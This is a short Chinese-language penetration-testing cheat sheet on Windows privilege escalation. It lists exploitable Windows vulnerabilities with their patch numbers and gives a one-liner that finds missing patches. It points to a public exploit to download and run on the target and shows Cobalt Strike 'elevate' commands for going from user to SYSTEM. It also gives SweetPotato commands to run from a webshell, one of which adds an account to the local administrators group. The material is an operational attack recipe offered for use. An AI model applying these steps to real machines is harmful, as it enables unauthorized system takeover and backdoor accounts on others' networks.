权限提升-Windows
大约 2 分钟
| 漏洞代号 | 补丁编号 | 适用平台 | 用途 |
|---|---|---|---|
| MS14-058 | KB3000061 | 03/08/12/Win7 | 本地提权 |
| MS15-051 | KB3057191 | 03/08/12/Win7 | 本地提权 |
| MS16-032 | KB3143141 | 08/12/Win7 | 本地提权 |
| MS16-135 | KB3198234 | 08/12/16/Win7/Win10 | 本地提权 |
| MS16-016 | KB3135173 | 08/Win7 | 本地提权 |
| MS17-010 | KB4013389 | 03/08/12/16/win7 | 远程注入dll |
| CVE-2020-0787 | KB4541505 | Windows全版本提权 | 本地提权 |
| MS14-068 | KB3011780 | 域控未安装补丁的域内,03,08,12 | 域内提权 |
| CVE-2020-1472 | KB4571723 | Zerologon(03/08/12/16/19) | 域内提权 |
| CVE-2021-1675 | KB5003671 | 打印机漏洞-域提权(16/19) | 域内提权 |
| CVE-2021-34527 | KB5003681 | 打印机漏洞-域提权(16/19) | 域内提权 |
| CVE-2021-42287 | KB5008380 | Server 2008 - 2022 | 域内提权 |
| CVE-2022-21882 | Windows Server 10 11 |
检测未打的补丁
systeminfo > temp.txt&(for %i in(KB3000061 KB3057191 KB3143141 KB3198234 KB3135173 KB4013389 KB4541505 KB3011780 KB4571723 KB5003671 KB5003681 KB5008380) do@type temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt
补丁号根据自己需求加,利用MSF中有相关EXP或者自行搜索 Github、searchsploit
CVE-2020-0787
直接下载EXP到目标主机上执行(需要上桌面,会弹出一个system权限的cmd窗口)
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION
二:利用Cobalt Strike提权
CobaltStrike附带了一些绕过UAC的攻击,但如果当前用户不是管理员(Administrator), 攻击会失效。
Beacon默认回连时间(心跳时间)为60秒,为了更快的渗透修改成32秒。
1、普通用户->系统管理员
如果你是普通本地用户权限,用以下命令提升到高权限
注意:如果是域用户会弹出认证窗口,不能提权
elevate uac-token-duplication test1(这个是你的监听器)
然后可以用svc-exe再提权到SYSTEM
2、系统管理员->系统权限
如果你有一个Administrator权限的Beacon,用以下命令提升到SYSTEM权限:
这个需要创建服务
elevate svc-exe test1
三:C#版的烂土豆
项目地址: https://github.com/uknowsec/SweetPotato (实测win7、08、12等可用)
直接在Webshell下执行
SweetPotato.exe -a whoami
SweetPotato.exe -a "net localgroup administrators test /add"